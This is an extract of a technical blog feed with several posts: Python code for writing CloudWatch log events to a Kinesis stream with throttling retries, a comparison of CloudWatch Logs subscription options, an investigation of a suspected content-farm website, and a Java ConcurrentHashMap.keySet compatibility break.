<p> The top-level <code>write_to_kinesis()</code> function repeatedly processes batches of records, with a sleep between batches to minimize throttling. The <code>process_batch()</code> function returns any messages that it couldn't send, for the next time through the loop. As I note, there shouldn't be more than one batch, unless you've configured the Lambda trigger to process lots of records or your destination is overloaded.
<pre class="codeSample">
def write_to_kinesis(listOfEvents):
records = prepare_records(listOfEvents)
while records:
records = process_batch(records)
if (records):
time.sleep(2) # an arbitrary sleep; we should rarely hit this
return
</pre>
<p> The <code>process_batch()</code> function is small but needs the most explanation. It starts with a call to <code>build_batch()</code>, which splits the source list of records into two parts: the first part contains all of the records that will fit in a single <code>PutRecords</code> call, the second is everything left over. Next is the actual call. Finally, <code>process_response()</code> looks at the result of the call to find any records that were throttled; these are added
<pre class="codeSample">
def process_batch(records):
toBeSent, toBeReturned = build_batch(records)
logging.info(f'sending batch of {len(toBeSent)} records with {len(toBeReturned)} remaining')
try:
response = kinesisClient.put_records(
StreamName=kinesisStream,
Records=toBeSent
)
return process_response(response, toBeSent) + toBeReturned
except kinesisClient.exceptions.ProvisionedThroughputExceededException:
logging.warn(f'received throughput exceeded on stream {kinesisStream}; retrying all messages')
return toBeSent + toBeReturned
</pre>
<p> I'm going to wrap up by looking at the <code>process_response()</code>, function in detail, because it's where the trickiness lies. The response for <code>PutRecords</code> contains an array of result objects, matched to the request records that you passed in. In the happy path, each of these result objects contains the sequence number that Kinesis assigned to the record (and <code>FailedRecordCount</code> is 0). In the unhappy path, some of the records fail but others succeed; the result object for the failed records will contain an error code.
<p> Making things a little more tricky, this error code can either indicate that the shard throttled the record, in which case we re-send it, or an internal error happened. The <a href="https://docs.aws.amazon.com/kinesis/latest/APIReference/API_PutRecords.html" target="_blank">API docs</a> don't go into details on exactly what an internal error is, or whether it's recoverable, so I assume that it isn't and drop the record.
<pre class="codeSample">
def process_response(response, records):
if response['FailedRecordCount'] == 0:
return []
result = []
droppedRecordCount = 0
for ii in range(len(response['Records'])):
entry = response['Records'][ii]
errorCode = entry.get('ErrorCode')
if errorCode == 'ProvisionedThroughputExceededException':
result.append(records[ii])
elif errorCode:
droppedRecordCount += 1
if droppedRecordCount > 0:
logging.warn(f'dropped {droppedRecordCount} records due to Kinesis internal errors')
if len(result) > 0:
logging.info(f"requeueing {len(result)} records due to throughput-exceeded")
return result
</pre>
<p> So, that's it. With a few adjustments to match your logging format (and, really, if you can just log in JSON), this will let you centralize your logs in Elasticsearch, even if AWS really, really wants you to use CloudWatch.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-66504881642704584922019-09-11T07:18:00.001-04:002019-09-11T07:18:41.359-04:00Streaming CloudWatch logs to Elasticsearch, Part 1: The Problem<p> My <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank"> preferred approach to application logging on AWS</a> is based around two ideas: first, that applications produce log messages in JSON, and second, that those messages are written directly to a Kinesis stream, which is then sent to Elasticsearch via Kinesis Firehose.
<p> Amazon's preference, however, is <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/WhatIsCloudWatchLogs.html" target="_blank">CloudWatch Logs</a>: it's the default log destination for AWS Batch and Lambda — indeed, you have to explicitly disable access to <em>stop</em> Lambda logging to CloudWatch; there's an agent for EC2; and the <code>awslogs</code> driver for Docker (ECS, EKS, or on-prem). Unfortunately, while CloudWatch Logs has come a long way from its original feature set, it still doesn't measure up to Elasticsearch. And in a multi-application environment, you don't want <em>two</em> centralized log services.
<p> So what to do?
<p> One answer is to use an alternative logging framework and bypass CloudWatch Logs. This can work, but you'll lose useful information such as the Lambda execution report. And <a href="http://blog.kdgregory.com/2019/01/multi-threaded-programming-with-aws.html" target="_blank">as I discovered</a>, any logging framework that uses a background thread to write log messages (which is usually a Good Thing) will run into problems when Lambda freezes the execution context.
<p> A better answer is to use a <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Subscriptions.html" target="_blank">CloudWatch Logs subscription</a>, in which a log group sends regular batches of messages to a variety of destinations. However, there are a surprising number of pitfalls with subscriptions. This post looks at the different subscription types and the pros and cons associated with each. My next post details an implementation that copies CloudWatch Logs into an existing Kinesis-based pipeline, from which they end up in Elasticsearch.
<p> This should be simple: if you use the AWS Console, you'll even see an option to subscribe a log group directly to Amazon Elasticsearch, which seems like the “no-brainer” choice. But after trying it out I consider it completely unsuitable: it sends updates multiple times per second, apparently with duplicates (because I wasn't writing that many messages in my tests). And Elasticsearch <em>hates</em> frequent small updates.
<p> A second option, also available from the Console, is to invoke a Lambda. <a href="https://github.com/kdgregory/aws-misc/tree/7b82a3bcd4bed3f394924e32939b75fb6cc9fe19/lambda/cloudwatch-logs-to-kinesis" target="_blank">I first went down this path</a>, with a Lambda that would write log messages to a Kinesis stream; from there they would be picked up by my existing pipeline. However, I abandoned this approach because, again, the Lambda was invoked <em>a lot</em>: it appears that CloudWatch invokes it as soon as events are logged, rather than attempting to batch them. With a moderately active log stream, this translates to over two million invocations per stream per month.
<p> There are two additional subscription options that aren't available from the Console: Kinesis Streams and Kinesis Firehose. Both use a similar format: each record written to the stream/firehose identifies the source log group and stream, with an array of zero or more log events. This rules out Firehose, which expects a 1:1 relationship between the records that it reads and the records that it writes.
<p> That left me with subscribing a Kinesis Stream, then attaching a Lambda to that stream to process the records. While this approach had a few more moving parts than I would like, it let me reuse most of my existing firehose architecture: the Lambda could write individual messages into the same Kinesis stream used for direct application logging, where they would be picked up by Firehose. And because you can specify the number of messages in a Kinesis-Lambda trigger, it meant that the number of invocations could be tuned. So all-in-all, a win.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-61890030773934399602019-07-22T06:57:00.000-04:002019-07-22T07:07:13.326-04:00Trying not to fertilize a content farm<p> I got an email this week from a person purporting to be the webmaster of a gardening
website, asking if I would link to his page about growing buckwheat at home, from my
page about buckwheat pancakes. The email seemed a little strange: it looked like a
form letter with inserted fields. And there was a link at the bottom to unsubscribe.
That's not something that I'd expect from a hobbyist looking to increase his connections.
<p> But, rather than just ignore the email, I decided to do some investigation. If you'd
like to play along at home, you'll find the site at “the daily gardener”
— for obvious reasons, I don't want to insert a link or anything like a link,
but I'm sure you can figure it out. Beware: while it has innocuous content today,
it may not six months from now; I used a guest account on my home Linux box, and
deleted the browser's config after visiting.
<p> As I said, it has innocuous content. In fact, for a likely content farm, it has
pretty good content: easily digestible chunks of information and lots of pictures.
In other words, consistent with most of the gardening sites that I've seen.
<p> There were, however, a few red flags. The first was that certain sentence phrasings
were not those of a native English speaker. That, however, could just be the result
of editing (I know that I've left some bizarre sentences online after deleting and
re-arranging words). The second red flag was that the word “daily” in the
title really did mean daily: there was a new long-form article published every day.
That too could be explained: the profile picture showed someone who appeared to be
post-retirement; he could craft content full-time.
<p> A third red flag was that there were very few outbound links. This is another place
where my experience is not necessarily relevant: while I put a lot of outbound links
on my site to provide the reader with more information, not everybody does. But
most of the gardening sites that I looked at do. And if he's requesting me to link
to his site, you'd think he'd be doing the same.
<p> None of these red flags were convincing, so my next step was to take arbitrary
sentences from his pages and put them into Google. In the past I've done this to find
people who are pirating content from my site, and have issued several DMCA takedown
requests as a result: people who put together pastiches tend not to change their
source material. Surprisingly, it took a half-dozen attempts before I found almost-exact
text from another site (which made me wonder whether most of the site's text was generated
by a bot).
<p> By now I was pretty much convinced this site was a content farm, so I explored its
history. First stop was <code>whois</code>, which told me that the domain had been
registered in 2005. Hmm, but all of the content looks new.
<p> Next stop was the <a href="https://archive.org/web/" target="_blank">Wayback Machine</a>,
to look at how the site changed over the years. And what I discovered was that it was
originally an online store, and remained so until the domain expired at the end of 2018.
And then in April of 2019, the site was revived with a new look and new content.
<p> Last up was a Google image search, using the picture from the “About Us”
page. And, in addition to multiple links to “his” site, there was a link to
Shutterstock. OK, that pretty much seals it.
<p> After doing this research, I did some searches to find out if there was anything else
that I should have looked for. And was surprised that there were very few “how
to spot a content farm” articles available (one of the better ones is from
<a href="http://researchguides.austincc.edu/c.php?g=435086&p=2965633"
target="_blank">Austin Community College</a>, apparently to keep students from using
such sites as citations). Most of the articles were about how content farms don't work,
and that Google actively penalizes them. But if you search for “growing
buckwheat” you will find the daily gardener site in the first page of results;
perhaps it's too new to have triggered alarms.
<p> And there is one thing that I find really strange about this site: there weren't any ads.
That is — or has been — the main reason for content farms: get people on the
site and hope that they click an ad. But not here. Nor did the network tab on my browser
show any activity after page load, so it wasn't (when I looked) some sort of click scam.
<p> So what's the goal? Is this a “long con” approach to black-hat SEO? Are
they building traffic before turning the site into something nasty?
<p> I don't know, but I won't be linking to it.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-5297325827637004392019-07-19T07:31:00.002-04:002019-07-19T07:33:09.928-04:00Broken Backwards Compatibility: The Bane of the Library Developer<p> Backwards compatibility has long been a hallmark of Java: there are many classes
and methods still in the standard library even though they've been deprecated
since the 1990s. Imagine my surprise, then, when I saw this exception:
<pre class="codeSample">
java.lang.NoSuchMethodError: java.util.concurrent.ConcurrentHashMap.keySet()Ljava/util/concurrent/ConcurrentHashMap$KeySetView;
at net.sf.kdgcommons.util.Counters.keySet(Counters.java:179)
...
</pre>
<p> To understand why, you need some back-story. I maintain a couple of open-source
libraries that I claim are compatible with Java 1.6. To ensure that I don't
accidentally use methods that didn't exist in 1.6, I have a 1.6 JVM installed
on my development machine, and tell Eclipse to use it to compile the project.
Ditto for the library that was running this test.
<p> However, I <em>don't</em> use the real 1.6 JDK for producing the released versions of these
libraries. I use Maven for releases, and the newer versions of Maven won't run on anything
older than JDK 1.8 (and there are enough backwards-incompatibilites between older versions
of Maven and its plugins that trying to use one is an exercise in frustration). This means
that, even though I'm setting my <code>target</code> property to 1.6, it's compiling against
the 1.8 standard library.
<p> And in 1.8, the Java maintainers changed the return type of <code>ConcurrentHashMap.keySet()</code>:
<a href="https://docs.oracle.com/javase/6/docs/api/java/util/concurrent/ConcurrentHashMap.html"
target="_blank">previously</a>, it returned a <code>Set</code>, as defined by the contract
of <code>java.util.Map</code>. In
<a href="https://docs.oracle.com/javase/8/docs/api/java/util/concurrent/ConcurrentHashMap.html"
target="_blank">1.8</a>, it returns a <code>ConcurrentHashMap.KeySetView</code>. This concrete
class implements <code>Set</code>, so it doesn't break the contract at the source level.
<p> However things are different at bytecode level: the actual return type is retained in the
method's <a href="https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html#jvms-4.3.3"
target="_blank">descriptor</a>, and the
<a href="https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html#jvms-6.5.invokevirtual"
target="_blank">invokevirtual</a> operation attempts to find a defined method that
matches that descriptor. It will accept a method definition that returns a subtype of the
specified return type, but not one that returns a supertype. So, when presented with a version
of that standard library in which <code>keySet()</code> returns a <code>Set</code>, the JVM
throws <code>NoSuchMethodError</code>.
<p> There is a work-around: cast the map reference to <code>java.util.Map</code>. This causes the
compiler to use the method definition from the interface, which fortunately has not changed
since it was released in 1.2.
<pre class="codeSample">
ConcurrentHashMap<K,V> map = // something
Set<K> keys = ((Map<K,V>)map).keySet();
</pre>
<p> There is a <a href="https://bugs.openjdk.java.net/browse/JDK-8151366" target="_blank">bug
report</a> for this behavior, which was closed with “Won't Fix”. Unfortunately,
that's the correct resolution: reverting the method signature would not only break any code
that relies on it, but also any deployed applications compiled with the old signature but
running on a JVM with the reverted signature.
<p> I can only hope that, in reviewing the bug report, the JVM maintainers realized that
changing the public API of a class — any class — is a mistake. Unfortunately,
some of the changes happening with newer releases of Java indicate this is to be a more
frequent occurrence. Which is probably why 1.8 remains (in my experience) the primary
deployment platform for Java apps, even though we're now at Java 12.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0